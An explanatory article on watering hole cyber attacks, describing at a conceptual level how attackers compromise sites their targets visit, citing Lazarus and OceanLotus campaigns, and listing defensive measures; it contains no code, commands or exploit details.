- The attacker first stalks the websites often visited by a victim or a particular group, and then infect the frequently visited websites with malware.
- The attacker then identifies the vulnerabilities associated with the websites and injects malicious code into the ads or banners displayed on the website.
A watering hole attack is a type of cyber attack, where an attacker observes the websites victim or a particular group visits on a regular basis, and infects those sites with malware. A watering hole attack has the potential to infect the members of the targeted victim group.
The malware used in watering hole attacks usually collects the target’s personal information and sends it back to the attacker-operated C&C server. Sometimes the malware can also give attackers full access to the victims’ systems.
Some statistics stating the success of ‘Watering hole attacks’:
- In 2013, high-profile websites such as Facebook, Twitter, Microsoft, and Apple were exploited to perform watering hole attacks.
- In 2017, Lazarus threat actor group conducted watering hole attacks to infiltrate financial institutions in Poland, Mexico, the U.K, and the United States.
- In 2018, almost 21 websites including the Ministry of Defense of Cambodia, the Ministry of Foreign Affairs and International Cooperation of Cambodia were compromised by OceanLotus threat actor group due to a watering hole attack.
How does ‘Watering hole attack’ work?
- The attacker first stalks the websites often visited by a victim or a particular group, and then infect the frequently visited websites with malware.
- The attacker then identifies the vulnerabilities associated with the websites and injects malicious programming code, often in JavaScript or HTML into the ads, banners etc displayed on the website.
- The malicious code then redirects the targeted groups to a phishing site where the malware or malvertisements are present.
- When the targeted group visits these websites, a script containing malware is automatically downloaded onto the victim’s machines.
- The malware then collects victims’ personal information and sends it back to the C&C server operated by the attacker.
Examples of Watering hole attack
Example 1- In 2017, Lazarus, the hacker group from North Korea launched a ‘watering hole attack’ by infecting websites with malware that the targeted victims were likely to visit.
The malware was designed to only infect visitors whose IP address showed they were from 104 specific organizations in 31 countries. The majority of targets were in Poland, followed by the United States, Mexico, Brazil, and Chile.
Example 2- In 2018, OceanLotus threat actor group, also known as APT32 launched a watering hole attack that compromised almost 21 websites. All the 21 distinct websites that had been compromised redirected to a separate domain controlled by the OceanLotus group.
The compromised websites included the Ministry of Defense of Cambodia, the Ministry of Foreign Affairs, International Cooperation of Cambodia and several Vietnamese newspaper or blog websites.
Generally, in a watering hole attack, the attackers compromise websites that are frequently visited by potential targets. However, in this attack, OceanLotus was also able to compromise some websites that attract large numbers of visitors apart from their speculated targets.
How to stay protected from ‘Watering hole’ attack?
- It is recommended to update all your software to the latest versions and keep your operating system up-to-date.
- It is best to properly configure firewalls and other network security products.
- To stay protected from Watering hole attacks, it is recommended to monitor all popular websites that employees visit and ensure that those sites are free from malware.
- Ensure your organization’s own websites are free from malware.
- In order to stay protected, hide your online activities with a VPN and your browser’s private browsing feature.
- It is always best to configure security tools to notify users of compromised websites.
- It is also recommended to educate employees about watering hole attacks.